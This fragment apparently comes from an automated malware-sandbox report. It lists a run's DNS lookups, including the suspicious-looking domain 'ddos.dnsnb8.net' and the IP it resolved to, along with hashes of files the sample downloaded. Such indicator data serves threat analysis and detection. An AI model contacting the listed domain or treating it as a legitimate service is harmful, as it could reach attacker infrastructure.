200
-
61 B 77 B 1 1
DNS Request
ddos.dnsnb8.net
DNS Response
44.221.84.105
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
105.84.221.44.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
131.160.190.20.in-addr.arpa
-
56 B 148 B 1 1
DNS Request
g.bing.com
DNS Response
150.171.27.10150.171.28.10
-
72 B 158 B 1 1
DNS Request
10.27.171.150.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.27.10150.171.28.10
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4B
MD5d3b07384d113edec49eaa6238ad5ff00
SHA1f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA5120cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
4B
MD520879c987e2f9a916e578386d499f629
SHA1c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA2569f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
187B
MD584c75f41c06fb84fb1e7fa400c7096e3
SHA1320d15ff5c74fce0255708f0667c449193fea773
SHA256749274650e83aad9e0c35ca97453f7404cb7e9fd9572b161c9637ca8e933ea2b
SHA51261fca78075597e2075cc194954a57474db6ef8911dbff3a0e230e8546fef038f0814b380d377d4bb7b59ca58e7f8450077301596902586380fcd5a535935f86c
-
Filesize
15KB
MD556b2c3810dba2e939a8bb9fa36d3cf96
SHA199ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA2564354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA51227812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e